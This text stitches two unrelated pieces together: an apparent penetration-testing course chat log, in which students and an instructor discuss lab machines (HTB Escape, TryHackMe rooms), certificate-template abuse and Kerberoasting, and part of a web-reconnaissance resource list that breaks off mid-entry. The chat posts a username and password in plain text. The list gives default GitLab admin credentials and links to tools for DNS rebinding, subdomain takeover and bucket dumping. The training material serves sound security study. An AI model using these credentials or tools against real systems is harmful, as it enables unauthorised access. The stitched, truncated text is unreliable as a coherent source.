Akhil Vijayan to everyone: 3:55 PM very less from Akhil Vijayan to everyone: 3:56 PM now its ok ok,, from Akhil Vijayan to everyone: 4:08 PM can we do a ping to our own ip and then use wireshark to find if we are getting the packets from the target server or not? from Akhil Vijayan to everyone: 4:11 PM wireshark would be better.. from Kartikey Jain to everyone: 4:27 PM henry:Q3c1AqGHtoI0aXAYFH from Kartikey Jain to everyone: 4:39 PM https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565 from Swati to everyone: 4:45 PM try this machine for linux priv esc - https://tryhackme.com/room/sudovulnssamedit 10/4 from Akhil Vijayan to everyone: 9:32 AM Mam, request if u can do explain "escape" . I was able to do till privilege escalation. post that i had to check online walkthrough to understand.. from Swati to everyone: 9:36 AM sure from Swati to everyone: 9:36 AM let from Swati to everyone: 9:36 AM let's cover that* from Akhil Vijayan to everyone: 9:47 AM how to reach the certificate related exploit confirmation mam?.. I was not able to do anything with mimikatz and similar techniques.. since the same was a new concept, it is requested if you can confirm on how to identify to reach such vuln checks.. from Akhil Vijayan to everyone: 9:55 AM mam, from this week, lets stay away from msfconsole so that we get a handson exp on custom / github tools.. from Akhil Vijayan to everyone: 9:55 AM right mam.. from Swati to everyone: 9:59 AM https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server from HomelandSecurity to everyone: 10:08 AM coudnt undrstand the last part from Akhil Vijayan to everyone: 10:08 AM Mam, request if you can explain the responder part once again.. from HomelandSecurity to everyone: 10:08 AM can you pls repeat from Akhil Vijayan to everyone: 10:08 AM why did we reach that dirtree option?. from Akhil Vijayan to everyone: 10:13 AM yes mam.. from HomelandSecurity to everyone: 10:13 AM yes clear from Swati to everyone: 11:10 AM https://github.com/GhostPack/Certify from Swati to everyone: 11:11 AM https://github.com/r3motecontrol/Ghostpack-CompiledBinaries from Akhil Vijayan to everyone: 11:15 AM mam if Ryan.Cooper is part of NT Authority ground, does that mean, from this account can we get NT Authority/System privs??.. from Akhil Vijayan to everyone: 11:15 AM group* from Akhil Vijayan to everyone: 11:15 AM NT Authority\Authenticated Users?.. from Akhil Vijayan to everyone: 11:16 AM from this groups result, how do we confirm this would be a certificate related vuln?. from HomelandSecurity to everyone: 11:16 AM we need NT Authority\SYSTEM to have all the privs from HomelandSecurity to everyone: 11:17 AM what is iwr ? from HomelandSecurity to everyone: 11:17 AM roger from Akhil Vijayan to everyone: 11:18 AM but as per attribute, its a mandatory group and enabled by default?? from Akhil Vijayan to everyone: 11:22 AM why is this vulnerable mam? from Akhil Vijayan to everyone: 11:23 AM can you explain once again? from Akhil Vijayan to everyone: 11:23 AM because the none of the groups are having Ryan.Cooper as the member.. from Kartikey Jain to everyone: 11:38 AM Hello Everyone from Kartikey Jain to everyone: 11:38 AM Which machine is this? from Akhil Vijayan to everyone: 11:38 AM htb escape from Kartikey Jain to everyone: 11:38 AM Cool from Akhil Vijayan to everyone: 11:40 AM u can create the cert.pfx without giving any password mam.. it worked for me.. could'nt find any online blogs w.r.t the password usage for certificate using rubeus from Akhil Vijayan to everyone: 11:40 AM because in red team notes also there is no mention about to give / not to give the password. from Akhil Vijayan to everyone: 12:04 PM /getcredentials work mam. from Akhil Vijayan to everyone: 12:04 PM but pls explain why /ptt doesnt work. from Swati to everyone: 12:22 PM we will discuss that by EOD from Swati to everyone: 12:22 PM for the time being, please work on this https://www.vulnhub.com/entry/symfonos-1,322/ from Swati to everyone: 12:22 PM if you have already completed the escape machine from Swati to everyone: 1:06 PM lunch break till 2:15 from Swati to everyone: 1:12 PM https://blackhatinside.wordpress.com/2016/04/03/kali-linux-2-0-install-configure-samba-server-for-file-sharing/ from Swati to everyone: 2:18 PM we will start in 5 mins from Akhil Vijayan to everyone: 2:26 PM screenshare not available mam. from HomelandSecurity (privately): 2:38 PM mam the one you showed ryt now has been covered earleir ? from HomelandSecurity (privately): 2:39 PM i mean the send mail utility and config.library-ms from HomelandSecurity (privately): 2:39 PM where exactly from HomelandSecurity (privately): 2:39 PM in which lab was it covered if i may know from HomelandSecurity (privately): 2:39 PM understood mam from HomelandSecurity (privately): 2:40 PM mam im one of the late joinees from HomelandSecurity (privately): 2:40 PM so bear with my questions sorry from Akhil Vijayan to everyone: 2:40 PM mam, how does the email server accepts an email from outside source without any authentication? from HomelandSecurity (privately): 2:40 PM :) from Swati to everyone: 2:59 PM it can depend on each lab whether authenticated emails are required or unauthenticated users can also send emails to organization users from Swati to everyone: 3:07 PM https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin from Swati to everyone: 3:18 PM wpscan --url <> --enumerate p,t --plugins-detection aggressive from HomelandSecurity to everyone: 3:19 PM are we doing the demo now ? from HomelandSecurity to everyone: 3:19 PM Ash is trying to speak something i gues from HomelandSecurity to everyone: 3:20 PM anyone else getting the audio from HomelandSecurity to everyone: 3:20 PM ? from Swati to everyone: 3:42 PM https://www.kali.org/tools/certipy-ad/ from HomelandSecurity (privately): 4:05 PM presentor requested to terminate Ash session from Swati to everyone: 4:14 PM We will cover quick walkthrough for symfonos in 10 mins. tea break from HomelandSecurity (privately): 4:29 PM what was the password for smbclient from HomelandSecurity (privately): 4:29 PM ? from HomelandSecurity to everyone: 4:30 PM ok from HomelandSecurity (privately): 4:49 PM mam from Akhil Vijayan to everyone: 4:49 PM mam, from HomelandSecurity (privately): 4:49 PM if we can execute commands directky using LFI from Akhil Vijayan to everyone: 4:49 PM can u pls tell what exploit did u do for the smtp for the previous machine? from HomelandSecurity (privately): 4:49 PM why do we need to send using php part from Akhil Vijayan to everyone: 4:49 PM just the methodology is enough from HomelandSecurity (privately): 4:50 PM i codunt get the intention behind that from Akhil Vijayan to everyone: 4:50 PM i presume we already have a RDP session to the windows machine which you have used. from Swati to everyone: 4:50 PM https://www.exploit-db.com/exploits/40290 from Akhil Vijayan to everyone: 4:50 PM not the current machine mam.. from HomelandSecurity (privately): 4:50 PM ok understood from Akhil Vijayan to everyone: 4:51 PM the previous one.. from Akhil Vijayan to everyone: 4:51 PM the previous machine mam.. from Akhil Vijayan to everyone: 4:51 PM the offsec machine from Akhil Vijayan to everyone: 4:52 PM can u explain the methodology from Akhil Vijayan to everyone: 4:53 PM the user interaction is automated or we had an rdp session mam? from Akhil Vijayan to everyone: 4:53 PM then what was the shortcut exploit you created mam?. from Akhil Vijayan to everyone: 4:54 PM but you had an rdp session right mam?. why cant we leverage this directly to compromise?.. from Akhil Vijayan to everyone: 4:55 PM ok mam. from Akhil Vijayan to everyone: 4:55 PM request if you can share the contents of the exploits created in codeshare2023 https://www.misecurity.net/tryhackme-enterprise-walkthrough2/ ------- chat from 11 am 11 apr 23 from Akhil Vijayan to Everyone11:11 Hi sir, why does my nmap scan of port 445 with -sC didnt show up any of the shares listed?.. from Akhil Vijayan to Everyone11:12 first i did all port scan from Akhil Vijayan to Everyone11:12 then selected 445 specifically from Akhil Vijayan to Everyone11:13 ok.. i will check sir . from Swati to Everyone11:18 https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py from Swati to Everyone11:18 " This script will attempt to list and get TGTs for those users that have the property # 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). # For those users with such configuration, a John The Ripper output will be generated so # you can send it for cracking." from Swati to Everyone11:31 https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py from Swati to Everyone11:32 This module will try to find Service Principal Names that are associated with normal user account. # Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request # will encrypt the ticket with the account the SPN is running under, this could be used for an offline # bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs. # This is part of the kerberoast attack from Swati to Everyone11:38 https://github.com/fortra/impacket/blob/master/examples/GetADUsers.py from Swati to Everyone11:38 This script will gather data about the domain's users and their corresponding email addresses. It will also # include some extra information about last logon and last password set attributes. from Swati to Everyone11:52 https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens from Ash to Everyone11:58 try restarting python server from Kartikey Jain to Everyone12:37 YAML Deserialization Attack Notes from Kartikey Jain to Everyone12:37 https://infosecwriteups.com/learning-more-about-yaml-deserialization-9c08093b4a3d from Kartikey Jain to Everyone12:37 Insecure Deserialization Attacks from Kartikey Jain to Everyone12:37 https://portswigger.net/web-security/deserialization/exploiting from Swati to Everyone13:17 https://medium.com/@_crac/cve-2022-26923-active-directory-domain-privilege-escalation-cc105d7ecbb0 from Swati to Everyone13:19 https://tryhackme.com/room/cve202226923 from Swati to Everyone13:46 next machine - https://tryhackme.com/room/vulnnetactive from Swati to Everyone13:47 We will go over linux priv esc post lunch at around 2:15 from Kartikey Jain to Everyone14:00 https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap from Swati to Everyone14:05 ldap* and not brute from Akhil Vijayan to Everyone14:48 mam, i have read to use kernel exploit at the last, if nothing works.. does that mean the machine may get corrupted?. from Swati to Everyone16:06 https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation from Akhil Vijayan to Everyone16:45 sir, request if you can be bit more louder.. from Kartikey Jain to Everyone17:03 rom Swati to everyone: 9:35 AM https://tryhackme.com/room/overpass3hosting from Swati to everyone: 9:35 AM https://codeshare.io/oscp2023 from AMIT to everyone: 9:36 AM Good morning mam we have not recieved voucher. req if any update on that from AMIT to everyone: 9:36 AM thanks from AMIT to everyone: 9:37 AM no mam its about exam from Swati to everyone: 10:11 AM command | tee -a output.txt from Akhil Vijayan to everyone: 10:19 AM whats the alternative mam?. from Akhil Vijayan to everyone: 10:21 AM if for one year we can have the voucher in the mailbox, then its better you can send the vouchers asap.. within one year we will redeem and attend the exam mam.. from Akhil Vijayan to everyone: 10:22 AM let them release mam.. within one year we will start with the oscp labs from Swati to everyone: 10:26 AM sure from Swati to everyone: 10:26 AM https://superuser.com/questions/920793/how-to-specify-private-key-when-decrypting-a-file-using-gnupg from Swati to everyone: 10:28 AM https://superuser.com/questions/920793/how-to-specify-private-key-when-decrypting-a-file-using-gnupg from Swati to everyone: 11:12 AM https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server from Kartikey Jain to everyone: 11:27 AM https://security.stackexchange.com/questions/242880/how-do-i-stabilize-a-reverse-shell-in-when-the-attack-box-is-using-powershell from Kartikey Jain to everyone: 11:27 AM Shell Stabilization Way from Kartikey Jain to everyone: 11:56 AM How to check ports without netstat from Kartikey Jain to everyone: 11:56 AM grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}' from Swati to everyone: 12:54 PM https://phoenixnap.com/kb/ssh-port-forwarding from Akhil Vijayan to everyone: 1:03 PM Mam, unable to hear any audio incase if you are taking the class.. from Swati to everyone: 1:13 PM we were just discussing port forwarding.. shared resource as well above. machine walkthrough will be done after lunch from Swati to everyone: 1:13 PM if you have any doubts you can post here from Akhil Vijayan (privately): 1:34 PM Mam, from morning i could'nt hear any audio.. As of now only the overpass tryhackme machine is being worked upon?.. from Swati to everyone: 1:37 PM righ from Swati to everyone: 1:37 PM rigjt* from Swati to everyone: 1:37 PM right*, we will cover walkthrough in somerime from Akhil Vijayan (privately): 1:48 PM no audio mam. incase if you are showing some walkthrough.. from Akhil Vijayan to everyone: 1:48 PM audio issues anyone?. from Swati to everyone: 1:48 PM not yet. will start in sometime .. after lunch 2:15 from Akhil Vijayan to everyone: 1:49 PM ok mam from rahul (privately): 2:03 PM please increase font size from Akhil Vijayan to everyone: 2:24 PM how to identify the webserver was running in php mam? from Akhil Vijayan to everyone: 2:24 PM it was not available in the nmap / page source from Akhil Vijayan to everyone: 2:28 PM i have did a nikto scan as well from Akhil Vijayan to everyone: 2:28 PM that too didnt give me any server side scripting language confirmation from Akhil Vijayan to everyone: 2:29 PM or is a trial and error?. from Akhil Vijayan to everyone: 2:37 PM what was the requirement of going to james instead of dong the priv esc from paradox mam? from Akhil Vijayan to everyone: 2:38 PM ok mam.. from Swati to everyone: 2:39 PM https://tryhackme.com/room/ra from Swati to everyone: 2:51 PM @Akhil - nmap for last machine had apache in the results which would indicate php from Akhil Vijayan to everyone: 3:00 PM ok mam.. from Swati to everyone: 4:13 PM https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md from Swati to everyone: 4:23 PM https://www.igniterealtime.org/downloads/#spark from Akhil Vijayan to everyone: 5:00 PM mam, did you host any image file from Akhil Vijayan to everyone: 5:00 PM or just started the responder..? from Akhil Vijayan to everyone: 5:01 PM the msg can be sent to other offline users also?. https://github.com/kartikeyj96/Tryhackme-Writeups/blob/main/Vulnet_Active_Writeup.pdf need to do some machines vulnhub typo start with nmap scan website at 80 phpmyadmin creds added file upload admin got a shell using fiel upload privilege escalation through binary
```pr0xh4ck © 2023``` ![demo](https://github.com/pr0xh4ck/web-recon/raw/main/pr0xh4ck.PNG) <details> <summary>Table of Contents</summary> <ol> <li><a href="#ip-test">IP Check</a></li> <li><a href="#dns">DNS</a></li> <li><a href="#internet-search-engine-discovery">Internet Search Engine Discovery</a></li> <li><a href="#subdomain-enumeration">Sudomain Enumeration</a></li> <li><a href="#dns-bruteforce">DNS Bruteforce</a></li> <li><a href="#osint">OSINT</a></li> <li><a href="#http-probing">HTTP Probing</a></li> <li><a href="#subdomain-takeover">Subdomain Takeover</a></li> <li><a href="#web-screenshot">Web screenshot</a></li> <li><a href="#cms-enumeration">CMS Enumeration</a></li> <li><a href="#automation">Automation</a></li> <li><a href="#cloud-enumeration">Cloud Enumeration</a></li> <li><a href="#github-secrets">Github & Secrets</a></li> <li><a href="#email-hunting">Email Hunting</a></li> <li><a href="#data-breach">Data Breach</a></li> <li><a href="#web-wayback">Web Wayback</a></li> <li><a href="#ports-scanning">Ports Scannig</a></li> <li><a href="#waf">WAF</a></li> <li><a href="#directory-search">Directory Search</a></li> <li><a href="#hidden-file-or-directory">Hidden File or Directory</a></li> <li><a href="#parameter-finder">Hidden Parameter Find</a></li> <li><a href="#bypass-forbidder-directory">Bypass Forbidden Direcory</a></li> <li><a href="#wordlists-payloads">Wordlists & Payloads</a></li> <li><a href="#miscellaneous">Miscellaneous</a></li> <li><a href="#social-engineering">Social Engineering</a></li> <li><a href="#scripts">One Line Scripts</a></li> <li><a href="#API_key">API kay</a></li> <li><a href="#Code_review">Code review</a></li> <li><a href="#log-file-analyze">Log File Analyze</a></li> <li><a href="#programs">Public programs</a></li> <li><a href="#burp-suite-extesion">Burp Suite Extension</a></li> <li><a href="#DOS">DOS</a></li> <li><a href="#Websocket">Websocket</a></li> </ol> </details> --- ## Start - [zoomeye](https://www.zoomeye.org/) - [sitelike](https://www.sitelike.org/) - [scans](https://scans.io/) - [Dorks-collections-list](https://github.com/cipher387/Dorks-collections-list/) - List of Github repositories and articles with list of dorks for different search engines - [dorksearch](https://dorksearch.com/) - Fast google dork ### shodan - [exposure](https://exposure.shodan.io/) - [faviconhasher](http://faviconhasher.herokuapp.com/) - [Shodan Facet](https://www.shodan.io/search/facet?query=&facet=http.title) - recon website - [http.favicon.hash](https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a) - http.favicon.hash: ``` ssl.cert.subject.CN:”*.target com”+200 http.favicon.hash: org:"Target" http.title:"GitLab" Username: root & pass: 5iveL!fe Username: admin & Pass: 5iveL!fe ``` ### ip-test - [centralops](https://centralops.net/co/) - [spyonweb](https://spyonweb.com/) - [whoisxmlapi](https://tools.whoisxmlapi.com/reverse-whois-search) - [viewdns](https://viewdns.info/) - [bgp.he.net](https://bgp.he.net/) - [shodan cli](https://cli.shodan.io/) - [fav-up](https://github.com/pielco11/fav-up) - IP lookup by favicon using Shodan - [testssl.sh](https://github.com/drwetter/testssl.sh) - Testing TLS/SSL encryption anywhere on any port - [ipaddressguide](https://www.ipaddressguide.com/) - IP address, traceroute an IP address, convert IP address into decimal value or CIDR format, and so on for both IPv4 and IPv6 format. > Virtual Host Finding - [scantrics](https://scantrics.io/tools/) ### dns - [dnsrecon](https://github.com/darkoperator/dnsrecon) - [host linux tool](https://tools.kali.org/) - [nslookup](https://www.nslookup.io/) ```bash apt-get update apt-get install dnsutils ``` - [domaineye](https://domaineye.com/) - [anslookup](https://github.com/yassineaboukir/Asnlookup) - [dns](https://github.com/miekg/dns) - [DNSStager](https://github.com/mhaskar/DNSStager) - [singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework. - [whonow](https://github.com/brannondorsey/whonow) - A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53) - [dns-rebind-toolkit](https://github.com/brannondorsey/dns-rebind-toolkit) - A front-end JavaScript toolkit for creating DNS rebinding attacks. - [dref](https://github.com/FSecureLABS/dref) - DNS Rebinding Exploitation Framework - [rbndr](https://github.com/taviso/rbndr) - Simple DNS Rebinding Service - [httprebind](https://github.com/daeken/httprebind) - Automatic tool for DNS rebinding-based SSRF attacks - [dnsFookup](https://github.com/makuga01/dnsFookup) - DNS rebinding toolkit > DNS public name server - [nameserver](https://public-dns.info/nameservers.txt) - [fresh-dns-servers](https://github.com/BBerastegui/fresh-dns-servers) - Fresh DNS servers ### internet-search-engine-discovery - [shodan.io](https://www.shodan.io/) - [shodan query](https://help.shodan.io/the-basics/search-query-fundamentals) - shodan basic query - [spyse](https://spyse.com/) - [censys](https://censys.io/ipv4) - [fofa](https://fofa.so/) - [binary edge](https://www.binaryedge.io/) ### subdomain-enumeration - [certificate.transparency](https://certificate.transparency.dev/) - [facebook](https://developers.facebook.com/tools/) - [crt.sh](https://crt.sh/) ```bash curl 'https://crt.sh/?q=%.example.com&output=json' | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u ``` - [tlshelpers](https://github.com/hannob/tlshelpers) - A collection of shell scripts that help handling X.509 certificate and TLS issues - [crtfinder](https://github.com/eslam3kl/crtfinder) - Fast tool to extract all subdomains from crt.sh website. Output will be up to sub.sub.sub.subdomain.com with standard and advanced search techniques - [amass](https://github.com/OWASP/Amass) - [subfinder](https://github.com/projectdiscovery/subfinder) - [dnsdumpster](https://dnsdumpster.com/) - [API-dnsdumpster.com](https://github.com/PaulSec/API-dnsdumpster.com) - (Unofficial) Python API - [assetfinder](https://github.com/tomnomnom/assetfinder) - [aquatone](https://www.rubydoc.info/gems/aquatone/0.4.1) - [censys](https://censys.io/ipv4) - [findomain](https://github.com/Findomain/Findomain) - [sublert](https://github.com/yassineaboukir/sublert) - [subdomainizer](https://github.com/nsonaniya2010/SubDomainizer) - [puredns](https://github.com/d3mondev/puredns) - [findfrontabledoamin](https://github.com/rvrsh3ll/FindFrontableDomains) - [domainhunter](https://github.com/threatexpress/domainhunter) - [sudomy](https://github.com/Screetsec/Sudomy) - [domainbigdate](https://domainbigdata.com/) - [anubis](https://github.com/jonluca/anubis) - [ctfr](https://github.com/UnaPibaGeek/ctfr) - [rapiddns](https://rapiddns.io/) > Exception(web) subdomain enumeration - [dns](https://dns.bufferover.run/dns?q=) - [tls](https://tls.bufferover.run/dns?q=) - [threatcrowd](https://threatcrowd.org/searchApi/v2/domain/report/?domain=) ```bash curl -s https://dns.bufferover.run/dns?q=DOMAIN.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u ``` > Find subdomain on GitHub - [github-subdomain](https://github.com/gwen001/github-subdomains) > Find subdomain from Official DoD(Depart of Defence) website - [mildew](https://github.com/daehee/mildew) ### dns-bruteforce - [dnsgen](https://github.com/ProjectAnte/dnsgen) - [altdns](https://github.com/infosec-au/altdns) - [shuffledns](https://github.com/projectdiscovery/shuffledns) - [dnsx](https://github.com/projectdiscovery/dnsx) - [zdns](https://github.com/zmap/zdns) - [subover](https://github.com/Ice3man543/SubOver) - [dnsvalidator](https://github.com/vortexau/dnsvalidator) - [gotator](https://github.com/Josue87/gotator) - [resolve domains](https://github.com/Josue87/resolveDomains) ### osint - [DarkScrape](https://github.com/itsmehacker/DarkScrape) - OSINT Tool For Scraping Dark Websites - [virustotal](https://www.virustotal.com/gui/home/search) - Analyze suspicious files and URLs to detect types of malware, automatically share them with the security community - [RED_HAWK](https://github.com/Tuhinshubhra/RED_HAWK) - All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers - [siteindices](https://www.siteindices.com/) - siteindices - [udork.sh](https://github.com/m3n0sd0n4ld/uDork) - [fav-up](https://github.com/pielco11/fav-up) - [testssl](https://github.com/drwetter/testssl.sh) - Testing TLS/SSL encryption anywhere on any port - [bbtz](https://github.com/m4ll0k/BBTz) - [sonar search](https://github.com/Cgboal/SonarSearch) - [notify](https://github.com/projectdiscovery/notify) - Notify is a Go-based assistance package that enables you to stream the output of several tools (or read from a file) and publish it to a variety of supported platforms. - [email finder](https://github.com/Josue87/EmailFinder) - [analytics relationships](https://github.com/Josue87/AnalyticsRelationships) - [mapcidr](https://github.com/projectdiscovery/mapcidr) - [ppfuzz](https://github.com/dwisiswant0/ppfuzz) - [cloud-detect](https://github.com/dgzlopes/cloud-detect) - [interactsh](https://github.com/projectdiscovery/interactsh) - [bbrf](https://github.com/honoki/bbrf-client) - [spiderfoot](https://github.com/smicallef/spiderfoot) - SpiderFoot automates OSINT for threat intelligence and mapping your attack surface. - [visualsitemapper](http://www.visualsitemapper.com/) - free service that can quickly show an interactive visual map of your site. - [jwt](https://jwt.io/) - JWT.IO allows you to decode, verify and generate JWT. Gain control over your JWTs - [bgp.he](https://bgp.he.net/) - Internet Backbone and Colocation Provider - [spyse](https://spyse.com/search?query&target=ip) - Find any Internet asset by digital fingerprints - [whoxy](https://www.whoxy.com/) - whois database ### http-probing - [httprobe](https://github.com/tomnomnom/httprobe) - by tomnomnom - [httpx](https://github.com/projectdiscovery/httpx) - by project discovery - [httpstatus](https://httpstatus.io/) - web version #### subdomain-takeover ```bash host -t CNAME input.com ``` - [subjack](https://github.com/haccer/subjack) - Subdomain Takeover tool written in Go - [SubOver](https://github.com/Ice3man543/SubOver) - A Powerful Subdomain Takeover Tool - [autoSubTakeover](https://github.com/JordyZomer/autoSubTakeover) - A tool used to check if a CNAME resolves to the scope address. If the CNAME resolves to a non-scope address it might be worth checking out if subdomain takeover is possible. - [NSBrute](https://github.com/shivsahni/NSBrute) - Python utility to takeover domains vulnerable to AWS NS Takeover - [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) - "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records. - [Can-I-take-over-xyz-v2](https://github.com/shifa123/Can-I-take-over-xyz-v2) - V2 - [cnames](https://github.com/cybercdh/cnames) - take a list of resolved subdomains and output any corresponding CNAMES en masse. - [subHijack](https://github.com/vavkamil/old-repos-backup/tree/master/subHijack-master) - Hijacking forgotten & misconfigured subdomains - [tko-subs](https://github.com/anshumanbh/tko-subs) - A tool that can help detect and takeover subdomains with dead DNS records - [HostileSubBruteforcer](https://github.com/nahamsec/HostileSubBruteforcer) - This app will bruteforce for exisiting subdomains and provide information if the 3rd party host has been properly setup. - [second-order](https://github.com/mhmdiaa/second-order) - Second-order subdomain takeover scanner - [takeover](https://github.com/mzfr/takeover) - A tool for testing subdomain takeover possibilities at a mass scale. ### web-screenshot - [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. - [aquatone](https://github.com/michenriksen/aquatone) - Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface. - [screenshoteer](https://github.com/vladocar/screenshoteer) - Make website screenshots and mobile emulations from the command line. - [gowitness](https://github.com/sensepost/gowitness) - gowitness - a golang, web screenshot utility using Chrome Headless - [WitnessMe](https://github.com/byt3bl33d3r/WitnessMe) - Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier. - [eyeballer](https://github.com/BishopFox/eyeballer) - Convolutional neural network for analyzing pentest screenshots - [scrying](https://github.com/nccgroup/scrying) - A tool for collecting RDP, web and VNC screenshots all in one place - [Depix](https://github.com/beurtschipper/Depix) - Recovers passwords from pixelized screenshots - [httpscreenshot](https://github.com/breenmachine/httpscreenshot/) - HTTPScreenshot is a tool for grabbing screenshots and HTML of large numbers of websites. ### cms-enumeration - [ObserverWard](https://github.com/0x727/ObserverWard) - Cross platform community web fingerprint identification tool > AEM - [aem-hacker](https://github.com/0ang3el/aem-hacker) - [cmseek](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs - [webanlyze](https://github.com/rverton/webanalyze) - Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning. - [whatweb](https://github.com/urbanadventurer/WhatWeb) - Next generation web scanner - [wappalyzer](https://www.wappalyzer.com/) - wappalyzer website - [wappalyzer cli](https://github.com/AliasIO) - Identify technology on websites. - [build with](https://builtwith.com/) - [build with cli](https://github.com/claymation/python-builtwith) - BuiltWith API client - [backlinkwatch](http://backlinkwatch.com/index.php) - Website for backlink finding - [retirejs](https://github.com/RetireJS/retire.js) -scanner detecting the use of JavaScript libraries with known vulnerabilities ### automation - [inventory](https://github.com/trickest/inventory) - Asset inventory on public bug bounty programs. - [bugradar](https://github.com/samet-g/bugradar) - Advanced external automation on bug bounty programs by running the best set of tools to perform scanning and finding out vulnerabilities. - [wapiti-scanner](https://github.com/wapiti-scanner) - Scan your website - [nuclei](https://github.com/projectdiscovery/nuclei) - Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. - [Nuclei-Templates-Collection](https://github.com/emadshanab/Nuclei-Templates-Collection) - Nuclei templates collection - [the-nuclei-templates](https://github.com/geeknik/the-nuclei-templates) - Nuclei templates written by us. - [scant3r](https://github.com/knassar702/scant3r) - ScanT3r - Module based Bug Bounty Automation Tool - [Sn1per](https://github.com/1N3/Sn1per) - Automated pentest framework for offensive security experts - [metasploit-framework](https://github.com/rapid7/metasploit-framework) - Metasploit Framework - [nikto](https://github.com/sullo/nikto) - Nikto web server scanner - [arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework - [jaeles](https://github.com/jaeles-project/jaeles) - The Swiss Army knife for automated Web Application Testing - [retire.js](https://github.com/RetireJS/retire.js) - scanner detecting the use of JavaScript libraries with known vulnerabilities - [Osmedeus](https://github.com/j3ssie/Osmedeus) - Fully automated offensive security framework for reconnaissance and vulnerability scanning - [getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits - [flan](https://github.com/cloudflare/flan) - A pretty sweet vulnerability scanner - [Findsploit](https://github.com/1N3/Findsploit) - Find exploits in local and online databases instantly - [BlackWidow](https://github.com/1N3/BlackWidow) - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website. - [backslash-powered-scanner](https://github.com/PortSwigger/backslash-powered-scanner) - Finds unknown classes of injection vulnerabilities - [Eagle](https://github.com/BitTheByte/Eagle) - Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities - [cariddi](https://github.com/edoardottt/cariddi) - Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more... - [kenzer](https://github.com/ARPSyndicate/kenzer) - automated web assets enumeration & scanning - [ReScue](https://github.com/2bdenny/ReScue) - An automated tool for the detection of regexes' slow-matching vulnerabilities. > file upload scanner - [fuxploider](https://github.com/almandin/fuxploider) - File upload vulnerability scanner and exploitation tool. > Network Scanner - [openvas](https://www.openvas.org/) - Free software implementation of the popular Nessus vulnerability assessment system. - [vuls](https://github.com/future-architect/vuls) - Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go. - [nexpose](https://www.rapid7.com/products/nexpose/download/) - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7. - [nessus](https://www.tenable.com/products/nessus) - Commercial vulnerability management, configuration, and compliance assessment platform, sold by Tenable. > Vulnerable Pattern Search - [gf](https://github.com/tomnomnom/gf) - A wrapper around grep, to help you grep for things - [Gf-Patterns-Collection](https://github.com/emadshanab/Gf-Patterns-Collection) - More and more > wordpress - [wpscan](https://github.com/wpscanteam/wpscan) > joomla - [joomscan](https://github.com/OWASP/joomscan) > drupal - [droopescan](https://github.com/SamJoan/droopescan) - A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe. ### cloud-enumeration - [s3-inspector](https://github.com/clario-tech/s3-inspector) - Tool to check AWS S3 bucket permissions - [S3-Recon](https://github.com/subzero987/S3-Recon/blob/main/S3-Recon.txt) - S3 RECON TIPS - [ScoutSuite](https://github.com/nccgroup/ScoutSuite) - [slurp](https://github.com/0xbharath/slurp) - [lazys3](https://github.com/nahamsec/lazys3) - [cloud_enum](https://github.com/initstring/cloud_enum) - [clovery](https://github.com/mlcsec/clovery) - [gcpbucketbrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - [teh S3 bucketeers](https://github.com/tomdev/teh_s3_bucketeers) > Buckets - [S3Scanner](https://github.com/sa7mon/S3Scanner) - Scan for open AWS S3 buckets and dump the contents - [AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) - Security Tool to Look For Interesting Files in S3 Buckets - [CloudScraper](https://github.com/jordanpotti/CloudScraper) - CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space. - [s3viewer](https://github.com/SharonBrizinov/s3viewer) - Publicly Open Amazon AWS S3 Bucket Viewer - [festin](https://github.com/cr0hn/festin) - FestIn - S3 Bucket Weakness Discovery - [s3reverse](https://github.com/hahwul/s3reverse) - The format of various s3 buckets is convert in one format. for bugbounty and security testing. - 